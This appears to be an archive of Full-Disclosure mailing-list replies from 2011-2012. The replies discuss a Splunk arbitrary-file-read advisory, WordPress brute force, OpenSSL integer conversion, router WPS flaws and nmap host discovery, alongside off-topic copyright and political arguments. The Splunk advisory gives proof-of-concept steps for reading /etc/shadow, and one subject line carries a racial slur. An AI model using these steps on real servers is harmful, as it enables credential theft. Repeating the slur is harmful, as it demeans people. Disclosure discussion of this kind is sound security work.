Re: [Full-disclosure] Splunk Vulnerability
1.) The tool, Splunk, is designed to index logs. 2.) Logs are arbitrary files. Therefore, 3.) Splunk is designed to index arbitrary files.

Whether or not you could preview the file before indexing, there would still be ways to gain access to the contents of the file once indexed. This just happens to make such access more convenient, at worst. (At best, it proves to be a useful part of a useful tool, allowing the user to verify the blob of data they wish to index is the/a proper blob to index.) At least, that's my understanding.

So it isn't a design defect, since that's exactly what Splunk is intended to do. It's only a vulnerability in the sense that it allows a potentially unprivileged user -- that is, one with access to Splunk but not necessarily to the machine -- to see privileged information. However, an administrator should already know that potentially sensitive information is easily searchable and recoverable through the tool in general by design, and adjust expectations, access rules, etc. accordingly. That, or restrict the privileges of the tool and/or its users (potentially restricting its usefulness as well).

On Sep 5, 2012 8:40 PM, Michael D. Wood m...@itsecuritypros.org wrote:

8/3/12 - Vendor Response: we don't consider this behaviour a design defect or vulnerability

Why on earth would they think this would be ok?

--
Michael D. Wood
ITSecurityPros.org
www.itsecuritypros.org

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Rodrigo Salvalagio
Sent: Monday, September 03, 2012 3:40 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Splunk Vulnerability

- Release date: September 3rd, 2012
- Discovered by: Marcio Almeida of CIPHER Intelligence Labs
- Severity: Medium
- CVSS Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N/E:P/RL:U/RC:C)

I. VULNERABILITY
Splunk <= 4.3.3 Reading Arbitrary Files Contents

II. BACKGROUND
Splunk[1][2][3] is software to search, monitor and analyze machine-generated data from applications, systems and IT infrastructure at scale via a web-style interface.[4] Splunk captures, indexes and correlates real-time data in a searchable repository from which it can generate graphs, reports, alerts, dashboards and visualizations.[5][6] Splunk aims to make machine data accessible across an organization, identifies data patterns[7], provides metrics, diagnoses problems and provides intelligence for business operations. Splunk is a horizontal technology used for application management, security and compliance, as well as business and web analytics.[8] Splunk has over 3,700 licensed customers in 74 countries, including almost half of the Fortune 100.[9]

III. INTRODUCTION
Splunk 4.3.3 and prior versions have Data Preview functionality located at Manager > Data Inputs > Files & Directories > Data Preview, which allows an authenticated user to read the content of arbitrary files on the server it is running on.

IV. PROOF OF CONCEPT
1 - Go to the screen of the functionality located at Manager > Data Inputs > Files & Directories > Data Preview.
2 - Insert the path to the file into the "Path to file on server" field.
3 - Click on Continue.
4 - See the content of the file.

The following screenshots illustrate reading the contents of /etc/shadow:
Step 1: http://imageshack.us/f/837/etcshadowserversplunk0d.png/
Step 2: http://imageshack.us/f/835/etcshadowserversplunk0d.png/

V. BUSINESS IMPACT
An authenticated attacker with admin privileges on Splunk could exploit the vulnerability to retrieve the contents of any sensitive files on the server accessible by the operating system user the Splunk service is running as. If splunkd is running as the root user, the attacker can read the content of any file on the server, including /etc/shadow and other sensitive configuration files. Thus, being an admin in the Splunk UI allows an attacker to obtain information that may lead to escalation of privileges on the operating system where Splunk is installed. The vendor was notified of this behavior, and declared not to consider it either a defect or a vulnerability.

VI. SYSTEMS AFFECTED
Version 4.3.3 and prior versions are vulnerable.

VII. SOLUTION
N/A.

VIII. DISCLOSURE TIMELINE
7/27/12 - Vulnerability discovered.
8/3/12 - Vendor contacted.
8/3/12 - Vendor response: "we don't consider this behaviour a design defect or vulnerability".
8/3/12 - Vendor informed about full disclosure in some days.
9/3/12 - Full disclosure.

IX. REFERENCES
[1]
Re: [Full-disclosure] Certificacion - Profesional Pentester
http://www.reactiongifs.com/wp-content/uploads/2011/05/THISGONBGUD.gif

On May 23, 2012, at 6:42 PM, Alex Buie ab...@kwdservices.com wrote:

This is gonna be fun.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] incorrect integer conversions in OpenSSL can result in memory corruption.
Well, not cleanly... I would think though that a signed integer cast to a size_t would have unpredictable results (but mostly just a larger value than intended...). At least when size_t and int are both 32bit. Or am I wrong?

On Apr 21, 2012, at 2:33 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Thu, Apr 19, 2012 at 10:32 AM, Benjamin Kreuter ben.kreu...@gmail.com wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On Thu, 19 Apr 2012 12:35:22 +0200 Tavis Ormandy tav...@cmpxchg8b.com wrote:

All versions of OpenSSL on all platforms up to and including version 1.0.1 are affected.
[snip]
BUF_MEM_grow_clean accepts a size_t, but the subroutine it uses to handle the allocation only accepts a 32bit signed integer.

Correct me if I am wrong, but shouldn't this only be a problem on systems where a size_t is wider than an int, i.e. not on 32 bit systems?

I don't believe so (that is, it can be a problem on 32 bit systems), but I'd need to see more context. For example, if the attacker controls the size and forces the size to negative (due to use of an int), then it will never convert to a size_t.

    void *CRYPTO_realloc_clean(void *str, int old_len, int num,
                               const char *file, int line)
    {
        /* ... */
        ret = malloc_ex_func(num, file, line);
        if (ret) {
            memcpy(ret, str, old_len);
            OPENSSL_cleanse(str, old_len);
            free_func(str);
        }
        /* ... */
        return ret;
    }
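The two conversion questions raised in this thread (whether int to size_t is unpredictable, and whether the size_t to int narrowing only bites when size_t is wider than int) can be checked directly. The block below is an added example written for this page; it is not OpenSSL code, and the function names (narrow_unchecked, widen_int, alloc_len_acceptable, size_to_int_checked, grow_checked) are illustrative stand-ins for the call shape quoted above. It assumes a typical two's-complement compiler such as gcc or clang, where an out-of-range size_t to int conversion wraps (the C standard leaves that implementation-defined); int to size_t, by contrast, is defined by the standard as modular, so -1 becomes SIZE_MAX whether or not size_t is wider than int.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Added example, not OpenSSL code. It mirrors the shape of the call
 * discussed in the thread: the caller holds a length as size_t, but the
 * allocation subroutine takes it as int. All names are illustrative.
 */

/* The unchecked path: how a size_t length reaches an int parameter.
 * Out-of-range values are implementation-defined in C; gcc and clang
 * wrap modulo 2^32 for a 32-bit int, so anything above INT_MAX turns
 * negative. This happens on 32-bit targets too: size_t 0x80000000 is
 * representable as size_t but not as int. */
static int narrow_unchecked(size_t len)
{
    return (int)len;
}

/* The opposite direction, as raised in the reply above: int -> size_t is
 * fully defined by the standard (reduction modulo SIZE_MAX + 1), so -1
 * becomes SIZE_MAX. Not unpredictable, just huge. */
static size_t widen_int(int n)
{
    return (size_t)n;
}

/* Stand-in for the int-taking allocator, hardened to refuse negative
 * lengths instead of handing them to malloc/memcpy. */
static bool alloc_len_acceptable(int num)
{
    return num >= 0;
}

/* Checked narrowing: the caller refuses any length int cannot hold, so a
 * negative value never reaches the allocator in the first place. */
static bool size_to_int_checked(size_t len, int *out)
{
    if (len > (size_t)INT_MAX)
        return false;
    *out = (int)len;
    return true;
}

/* Simulates growing a buffer to 'len' bytes through the int-taking
 * subroutine. Returns true only when the request is representable and
 * non-negative; this is the check the thread says the real path lacked. */
static bool grow_checked(size_t len)
{
    int num;
    if (!size_to_int_checked(len, &num))
        return false;
    return alloc_len_acceptable(num);
}

int main(void)
{
    size_t too_big = (size_t)INT_MAX + 1u;   /* constructed input: 2^31 */
    printf("(int)%zu = %d\n", too_big, narrow_unchecked(too_big));
    printf("(size_t)-1 = %zu\n", widen_int(-1));
    printf("grow_checked(%zu) = %d\n", too_big, grow_checked(too_big));
    printf("grow_checked(4096) = %d\n", grow_checked(4096));
    return 0;
}
```

Compile with cc -std=c11 and run: on both 32-bit and 64-bit targets INT_MAX + 1 narrows to INT_MIN, which matches the point made in the thread that 32-bit systems are not exempt; any length at or above 2^31 misbehaves once it is stored in an int. The defensive shape is to reject lengths above INT_MAX before calling the int-taking subroutine, and to have that subroutine reject negative lengths as a second line of defence.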
Re: [Full-disclosure] Brute Force vulnerability in WordPress
He also considers it a vulnerability to tell a new user that the username they've picked out has been taken by another user.

On Sun, Mar 25, 2012 at 3:09 PM, InterN0T Advisories advisor...@intern0t.net wrote:

Same type of vulnerabilities exist in 99,999...% of all web applications, including your website. Even if you can't bruteforce all the time, you can adjust it with timing, and e.g. proxies, different user-agents, etc., and then you have Timed Bruteforce Attacks, which work on pretty much all websites. Did you also mention this 5-10 years ago on your web site about website security named websitesecurity.com.ua?

Also, when will you stop posting about bruteforce / full path disclosure / locking actual users out / and other low priority vulnerabilities that exist in most web apps, and completely move on to vulnerabilities that matter? Seriously, anyone can find these vulnerabilities, and the reason why no one has reported / disclosed / complained about them is because they exist in most apps and don't compromise the security of the end-user nor the website. Will the next thing you disclose be about bruteforcing SSH because it by default doesn't lock users out? It's been like this for +10 or +20 years.

What I find funny is that either you:
A) Say a web app has a vulnerability because it doesn't lock the offending user out because of too many password tries, OR
B) Say a web app has a vulnerability because it does lock out the offending user because of too many password tries.

It's almost a contradiction and an endless evil circle. You can't have both, ever. No offense intended of course.

Best regards,
MaXe

On Sun, 25 Mar 2012 23:45:33 +0300, MustLive mustl...@websecurity.com.ua wrote:

Hello list!

There are many vulnerabilities in WordPress which exist from version 2.0, or even from 1.x versions, and are still not fixed. So I want to warn you about one of such holes. It's a Brute Force vulnerability via XML-RPC functionality in WordPress.

Affected products:
Vulnerable are WordPress 3.3.1 and previous versions.

Details:
Brute Force (WASC-11):
http://site/xmlrpc.php

In this functionality there is no protection against Brute Force attack. By sending corresponding POST requests it's possible to pick up the password.

Note that since WordPress 2.6 the XML-RPC functionality is turned off by default. WP developers did it due to vulnerabilities (such as SQL Injection and others) which were found in this functionality, i.e. not motivating it as a counteraction to Brute Force, but it also worked as protection against Brute Force attack. So this issue doesn't concern those who use WordPress since version 2.6 with default settings. But those who need to use XML-RPC will have the Brute Force vulnerability, because the developers didn't make reliable protection against it.

Earlier, in 2008 and 2010, I already wrote about Brute Force vulnerabilities in WordPress (http://websecurity.com.ua/2007/ and http://websecurity.com.ua/4016/, SecurityVulns ID: 10677) and this is another such vulnerability. Besides them there is also a known BF attack not via the login form, but using the authorization cookie (when by setting different cookies it's possible to pick up the password).

Timeline:
2012.03.20 - disclosed at my site.

I mentioned this vulnerability at my site (http://websecurity.com.ua/5723/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] Earth to Facebook
Could he not use a trusted intermediary though? That is, find someone to report the issue who can be entangled by ToS, will take screenshots, etc. I suppose the biggest problem of this would be the trust part, though. :)

On Mar 18, 2012 9:14 AM, Jeffrey Walton noloa...@gmail.com wrote:

On Sun, Mar 18, 2012 at 8:57 AM, Ferenc Kovacs tyr...@gmail.com wrote:

https://www.facebook.com/whitehat/report/ ?

It's encumbered by Terms of Service. It's better to find an email address so that (1) you are not bound by legal entanglements, and (2) you have a written record of the correspondence. I'd try RFC 2142 (MAILBOX NAMES FOR COMMON SERVICES, ROLES AND FUNCTIONS, http://www.ietf.org/rfc/rfc2142.txt): sec...@facebook.com and secu...@facebook.com.

Jeff

On Thu, Mar 15, 2012 at 4:37 PM, J. Oquendo s...@infiltrated.net wrote:

Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one should have to hunt you guys down in an effort to assist you with security flaws.
Re: [Full-disclosure] Cookie based SQL Injection
Even so, watch all the advisories pour in now for cookie-based SQL injection. :/

On Mar 6, 2012 12:44 PM, valdis.kletni...@vt.edu wrote:

On Tue, 06 Mar 2012 14:28:51 CST, Adam Behnke said:

Unlike other parameters, cookies are not supposed to be handled by users.

Any site that designs its security model around that concept will get what it richly deserves.
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Solution: use DD-WRT? Or is that vulnerable too? (Or are there worse problems? :))

On Feb 10, 2012 10:12 AM, Dan Kaminsky d...@doxpara.com wrote:

Fixing a vulnerability like this with all the bureaucratic, QA and legal process wouldn't take more than 2 weeks

If bureaucratic, QA, and legal issues emerge, you can't even get the names of the people you need to speak to in less than 2 weeks, let alone schedule a conference call. Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either.

Sent from my iPhone

On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote:

Don't buy Linksys Routers; they are vulnerable to the Wifi unProtected Setup PIN registrar brute force attack. No patch or workaround exists at the making of this post.

Vulnerable list and alleged patch availability (source: http://www6.nohold.net/Cisco2/ukp.aspx?vw=1&articleid=25154):

    E1000        - To Be Disclosed (aka we don't have idea)
    E1000 v2     - To Be Disclosed
    E1000 v2.1   - To Be Disclosed
    E1200 v1     - early March
    E1200 v2     - early March
    E1500        - early March
    E1550        - mid March
    E2000        - To Be Disclosed
    E2100L       - mid March
    E2500        - early March
    E3000        - To Be Disclosed
    E3200        - early March
    E4200 v1     - early March
    E4200 v2     - To Be Disclosed
    M10          - To Be Disclosed
    M20          - To Be Disclosed
    M20 v2       - To Be Disclosed
    RE1000       - early March
    WAG120N      - To Be Disclosed
    WAG160N      - To Be Disclosed
    WAG160N v2   - To Be Disclosed
    WAG310G      - To Be Disclosed
    WAG320N      - To Be Disclosed
    WAG54G2      - To Be Disclosed
    WAP610N      - To Be Disclosed
    WRT110       - To Be Disclosed
    WRT120N      - To Be Disclosed
    WRT160N v1   - To Be Disclosed
    WRT160N v2   - To Be Disclosed
    WRT160N v3   - To Be Disclosed
    WRT160NL     - To Be Disclosed
    WRT310N v1   - To Be Disclosed
    WRT310N v2   - To Be Disclosed
    WRT320N      - To Be Disclosed
    WRT400N      - To Be Disclosed
    WRT54G2 v1   - To Be Disclosed
    WRT54G2 v1.3 - To Be Disclosed
    WRT54G2 v1.5 - To Be Disclosed
    WRT54GS2 v1  - To Be Disclosed
    WRT610N v1   - To Be Disclosed
    WRT610N v2   - To Be Disclosed
    X2000        - To Be Disclosed
    X2000 v2     - To Be Disclosed
    X3000        - To Be Disclosed

The question is why a big company like Cisco/Linksys didn't release a patch in almost a month and a half? Well, I have circumstantial evidence that Cisco outsources some of their Linksys router firmware to other companies (Arcadyan for example); in some cases source code is only available through NDAs or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureaucratic, QA and legal process wouldn't take more than 2 weeks. I found some GPL violations by the way, but this is beyond the scope of this message (obfuscating firmware is useless, you know). I apologize if I offended someone, but IT security is serious business, especially if someone uses your wifi to commit crimes. This vulnerability has public and very easy to use exploit code; it's not a Denial of Service.

Farth Vader.
Re: [Full-disclosure] can you answer this?
The original message reads thus:

    i was working with cleaning up any to any on fw. ran across inside ips doing netbios (NS) , and one using port 4330 to 7.8.0.106, or .107. a who is give .miil DoD Network Information Center. ? we are just a manufacturing company. One ip is from a NAS device for staorage. The other is DNS server

I expect it's supposed to read like this:

    I was working on cleaning up my 'any to any' rulesets on my firewall and I ran across internal IPs using the NetBIOS protocol, which is unexpected behavior. One of my internal hosts also appears to be attempting to connect to 7.8.0.106 or 7.8.0.107 on port 4330. A WHOIS lookup tells me that those IPs belong to the IP range owned by the U.S. Department of Defense. What is going on? We're just a manufacturing company. One of the IPs participating in this traffic is supposed to be network storage, while the other is supposed to just do DNS.

And because no one answered him, he decided to try another line of inquiry:

    My firewall logs have also picked up traffic from our internal trusted network to an external untrusted network with entries such as:

    2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0 0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied

    It was denied. What is happening here?

I have no idea what's happening there; I'd suggest looking at the machines for strange activity, maybe doing some tcpdumps and seeing if you can trace back any of the packets you find to any of your machines. But I can't think of any reason your internal machines should be trying to connect to those hosts. (Especially considering those hosts may not exist!)

On Fri, Feb 3, 2012 at 12:31 AM, ja...@zero-internet.org.uk wrote:

So what's the question?

--Original Message--
From: RandallM
Sender: full-disclosure-boun...@lists.grok.org.uk
To: funsec
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] can you answer this?
Sent: 3 Feb 2012 08:20

since no one could answer the last one how bout this. In my FW log Trust (our 10.0.0.0. network) to untrust picked this up:

2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0 0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied

My any to any denied queue.

-- been great, thanks
RandyM a.k.a System
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Just to be clear, what's been done in the name of intellectual property protection is fucking ridiculous. I just do not see how getting something someone put a non-zero value of work and materials into without even so much as asking or being given permission from the person who made it is somehow not even at the very least disrespectful. Even if it is just a reproduction, it took effort to create, and you must figure it's worth something or you wouldn't have expended the effort to reproduce it to begin with. (Fair use being the main exception there, but fair use usually implies something distinctive being done to the work, too, as opposed to minor editing/shitty encoding. Feel free to correct!) To be honest and realistic, nothing can ever be done to stop copying. Ever. Nor should it. I'm just saying I consider there's no harm in it to be a myth in most cases. At the core of it, I think copyright's a totally valid thing to have, if only to stop plagiarism. Its implementation, however... (I don't see my stance changing in the near future, either. I'm sorry, I'm kind of rigid in that line of thought and I haven't heard or read anything yet to adequately address everything.) Anyway; back to lurking for me. :) On Jan 30, 2012 12:17 AM, Christian Sciberras uuf6...@gmail.com wrote: Uhm, that was a ridiculous situation anyway (@illegal primes). So lets leave it at 'not necessarily'. On Mon, Jan 30, 2012 at 9:08 AM, Mike Hale eyeronic.des...@gmail.comwrote: Not necessarily. Look at the effects of people posting DeCSS and the HDDVD keys a while back. The industry ended up giving in precisely because people said, en masse, fuck off. On Mon, Jan 30, 2012 at 12:05 AM, Christian Sciberras uuf6...@gmail.com wrote: No, it follows the fact that vengeance (the fuck you Byron mentioned) isn't fruitful to remedy the situation. On Mon, Jan 30, 2012 at 8:54 AM, Mike Hale eyeronic.des...@gmail.com wrote: What you said doesn't follow. Making a digital copy isn't burning down a business. 
The analogy linking 'piracy' with theft is ludicrous. On Sun, Jan 29, 2012 at 11:50 PM, Christian Sciberras uuf6...@gmail.com wrote: Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean... On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote: The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how they much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught. The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material. If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;) If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet. The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy. 
I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point. In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited
Re: [Full-disclosure] when did piracy/theft become expression of freedom
On Jan 27, 2012 4:07 PM, valdis.kletni...@vt.edu wrote: On Fri, 27 Jan 2012 18:06:28 GMT, Michael Schmidt said: You want to be very careful with that line of thought. You are taking the creator the rightful owners profits, which they are entitled to if it is a product they created to be sold. You might want to go read Courtney Love Does The Math, and then ask yourself the following: 1) You can make a case that if you copy an album intead of buying it, you're depriving somebody of profits. But what if it's an album that you would *not* have bought at full price anyhow? Or one that you bought used (see first sale principle)? If you buy an album used, the seller generally loses possession of it, you gain possession of it at a reduced cost, and the original purchase still gave the original seller and producer value. Value has still been exchanged, assuming no literal theft was involved to make the whole thing criminal anyway. If you make a copy, you're pretty much creating (or, if you prefer, *re*-creating) value out of basically nothing using source material, but nothing of value goes back to the original creator of what was copied. Besides that, I do not trust customers to make their own price up for everything they buy because (a) they may be honest but not know how to properly appraise a piece of work or (b) they will try to shaft you. It's literally like blindly trusting user input. Before you bring up Humble, Radiohead, et al: just because it can and has been done a few times doesn't mean it's viable or as lucrative as it should be. (Humble even STILL had pirates, IIRC!) 2) Who gets those profits, the artist, the label, or the RIAA? Are you stealing profits from the artist, or are you stealing them from somebody else who was attemting to steal them from the artist? All of the above; while the companies' creative accounting is almost criminally bullshit, the artist *still* gets a cut and even a profit if they do well enough. 
As a nasty little bonus, any profit taken from those companies will never, ever be seen by the artist regardless. There is a 100% better chance of an artist receiving money via a record company getting paid for the artist's work than a record company *not* getting paid for the artist's work. It's gotta come from somewhere. So if you're screwing them and they're screwing the artist, you just wind up making them screw the artist that much harder.
Re: [Full-disclosure] Nmap
Yet another note, this one ARP-related: while it's true that most devices on your local network will respond to ARP, it's important to note (as the wording of "almost certain" implies) that it is possible to purposely suppress ARP responses to all but a few hosts. I know for certain that the Linux kernel has a module (and associated toolset) specifically for that sort of thing called arptables, with usage very similar to iptables if you're already familiar with that.

There's also a tool (again on *nix) called arping, which is ping but with ARP requests. Device firewalls (or at least Windows's built-in firewall) tend not to block ARP requests or replies, so arping might be able to show you those firewalled hosts, too. (That doesn't mean those hosts aren't properly configured to correctly block incoming traffic, however!)

On Mon, Jan 2, 2012 at 2:10 PM, Gage Bystrom themadichi...@gmail.com wrote:

(I don't have the original, so I'll quote this guy.)

Nmap has an option to change how it determines if a host is up by attempting a port connection instead. I find this to be highly effective. Using a couple of standard ports is best, such as 80, 21, etc. If you only have a few ports you're searching for, then drop host discovery and scan those specific ports; you'd get the same results but a tad less overhead (mainly in the sense of stealth, or an obsession with not wasting bandwidth if you can help it).

On Jan 2, 2012 1:00 PM, S Walker walke...@hotmail.co.uk wrote:

Just an added note to the current replies (which are all great for hosts not in the local broadcast domain): It is almost certain that every device in your local network will respond to an ARP request. nmap does this by default anyway (-PR for local networks), but it's worth bearing in mind, as something local that won't respond to an ARP request is almost certainly not reachable.

S

Date: Mon, 2 Jan 2012 12:03:42 -0500
Subject: Re: Nmap
From: juan.qu...@gmail.com
To: pen-t...@securityfocus.com

Sorry for the late answer... But when you scan for machines that do not answer to ping (meaning answer with an echo reply for each echo request), you could try using timestamp, which will return a timestamp reply, and also information request, and wait for an information reply. Both could be useful also to detect equipment that does not answer to ping. And if you want something more noisy, maybe a network discovery or a -P0 option.

Here is a summary of message types with their port (for ICMP protocol):

    0   Echo Reply
    3   Destination Unreachable
    4   Source Quench
    5   Redirect
    8   Echo
    11  Time Exceeded
    12  Parameter Problem
    13  Timestamp
    14  Timestamp Reply
    15  Information Request
    16  Information Reply

More detail on: http://www.faqs.org/rfcs/rfc792.html

Hope it will be useful.

Regards,
Juan Pablo.

On Sun, Oct 2, 2011 at 4:35 PM, John M. Martinelli wrote:

This would work, but it would be kind of noisy to open-port scan every host. Also probably a little more time consuming. Adding in a syn scan or open port scan will create more time required, as we're now looking for open ports. What if all ports are closed? Will it respond to a certain type of ICMP? I think a great question to ask is: What is the least-impactful way I can very quickly determine what hosts are alive, without a traditional ping sweep?

On Sat, Oct 1, 2011 at 10:37 PM, Jeffory Atkinson wrote:

All depends on what you are trying to achieve. I would assume that you are not concerned about monitoring devices seeing you have done a ping sweep with nmap. I agree with others: a port scan is going to give you the best idea if a host is active. There are many instances where filtering devices can drop ICMP or respond for hosts behind them. Open ports and services are the best identifiers. A port has to be open in some form (open or filtered) to interact with in-bound connections. I would recommend a -sS (syn) scan; you can opt for standard services or add -p1- for all 65k+ ports. All ports will verify any services/daemons running. There are other options if bandwidth is an issue.

On Sep 30, 2011, at 5:17 PM, Ukpong wrote:

Can somebody suggest the best NMAP commands for identifying hosts that are not responding to ICMP ping requests?

This list is sponsored by: Information Assurance Certification Review Board. Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Indeed? Are they supposed to be taking pictures of events with handmade cameras? Wearing clothes they made from the ground up? Not shaving or shaving with crudely-fashioned makeshift blades from spare metal? The usage of corporate products does not disqualify one from criticizing those corporations, their behaviors, their products or the government. At least partially because it's practically unavoidable for most people. Are you honestly saying they should have just spread local word of mouth in their area and hoped it would sweep the country because that wouldn't have used any corporate resources? That is a most inefficient way of moving people, especially with a news media that is proving actively hostile to those who are admittedly threatening its cushy seat. On Oct 12, 2011 9:41 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: I saw this on FB and thought I would pass it along: http://99percentexif.tumblr.com/ ** ** It’s the exif data from the photos the 99%’ers are posting – showing the $1000 systems, cameras, and software they are using to post. ** ** t ** ** *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian Sciberras *Sent:* Wednesday, October 12, 2011 12:45 AM *To:* noloa...@gmail.com *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules ** ** Regarding who's doing the most damage to US economy, I'll just say I won't comment. ** ** I take issue with the 1%/99% idea; ie, the excuse that some people deserve more just because they are allowed to lie - even if it makes them hypocrites. ** ** ** ** On Wed, Oct 12, 2011 at 9:40 AM, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 12, 2011 at 2:51 AM, Christian Sciberras uuf6...@gmail.com wrote: Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! 
It's not about greed - pursuit of wealth is fine. You just can't harm others while doing it. (Well, apparently you can in the US).

One of the funniest things I ever read regarding Bin Laden's little war was a boycott of the US dollar to reduce reliance [on the dollar] and to harm the US economy [1].

Thought experiment: terrorist wanted to ruin the US economy. US Financial institutions threw the US (and world) economy into a recession (again). The US financial institutions responsible must be terrorist organizations.

Thank {insert higher being here} that Bin Laden did not make a PAC contribution on 9/10.

Jeff

[1] http://www.nytimes.com/2010/01/30/world/middleeast/30binladen.html

On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote:

Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward.

How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too.

The last time I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'.

Jeff

[1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm

[SNIP]

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
I wasn't aware they were advocating the dissolution of all corporations; I had heard through various outlets that they simply didn't want money influencing laws to favor the corporation over the individual. As well as the bailing out of the banks while leaving the people homeless.

And I don't think I'll let the threat of being a hypocrite stop me from saying Apple sucks balls just because I own and no longer use an iPhone.

On Oct 12, 2011 2:17 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

--On October 12, 2011 11:00:32 AM -0700 Zach C. fxc...@gmail.com wrote:

Indeed? Are they supposed to be taking pictures of events with handmade cameras? Wearing clothes they made from the ground up? Not shaving or shaving with crudely-fashioned makeshift blades from spare metal? The usage of corporate products does not disqualify one from criticizing those corporations, their behaviors, their products or the government.

No, but it certainly does make one a hypocrite.

At least partially because it's practically unavoidable for most people. Are you honestly saying they should have just spread local word of mouth in their area and hoped it would sweep the country because that wouldn't have used any corporate resources? That is a most inefficient way of moving people, especially with a news media that is proving actively hostile to those who are admittedly threatening its cushy seat.

Isn't that interesting? They want to get rid of all the corps, yet they don't want to do without their products because it would be "a most inefficient way of moving people". If you can't see the irony and hypocrisy of that position, you might be a liberal. Oh, 'scuse me, progressive.

-- Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions are my own and not those of my employer.
* It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell
Re: [Full-disclosure] New open source Security Framework
Telling people to move their criticisms off of the (unmoderated) public forum and into the private forum that you control (and can freely censor as you see fit) is ridiculous.

Now, if you really did as root said and just grabbed peoples' code from various public outlets and put it into your GPL product... *you really can't do that*. First off, the copyright of the code does not belong to you. You have to get permission or a separate license, *in writing*, *from the original author of the code*. If they don't give it to you, you have to do without or have someone cleanroom it for you (if you rewrite it yourself, your clone is arguably contaminated by your previous exposure). And they have to specifically authorize you to redistribute with the GPL license. If *they've* distributed with GPL, you should be fine; if they've distributed with nearly *any other license at all*, you have to get permission to redistribute since most other licenses impose additional restrictions which are specifically forbidden by the GPL. And if you're AT ALL unclear on what the redistribution license for their code is, the safe choice is simply to not redistribute. Just because someone puts their code out in public doesn't mean you're allowed to put their code out in public as well.

